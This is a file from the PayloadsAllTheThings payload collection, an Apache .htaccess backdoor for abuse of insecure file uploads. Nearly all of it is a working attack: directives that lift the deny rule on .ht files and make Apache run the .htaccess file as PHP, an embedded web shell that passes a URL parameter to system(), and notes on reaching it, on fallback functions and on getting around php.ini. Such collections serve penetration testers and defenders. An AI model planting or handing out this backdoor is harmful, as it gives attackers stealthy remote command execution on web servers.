PayloadsAllTheThings/Upload Insecure Files/Configuration Apache .htaccess/.htaccess_shell

24 lines
662 B
Plaintext
Raw Normal View History

2020-09-27 09:16:50 +00:00
# htaccess backdoor shell
# this is relatively stealthy compared to a typical webshell
# overriding deny rule
# making htaccess accessible from the internet
# without this you'll get a HTTP 403
<Files ~ "^\.ht">
Require all granted
Order allow,deny
Allow from all
</Files>
# Make the server treat .htaccess file as .php file
AddType application/x-httpd-php .htaccess
# <?php system($_GET['cmd']); ?>
# To execute commands you would navigate to:
# http://vulnerable.com/.htaccess?cmd=YourCommand
# If system(); isnt working then try other syscalls
# e.g. passthru(); shell_exec(); etc
# If you still cant execute syscalls, try bypassing php.ini via htaccess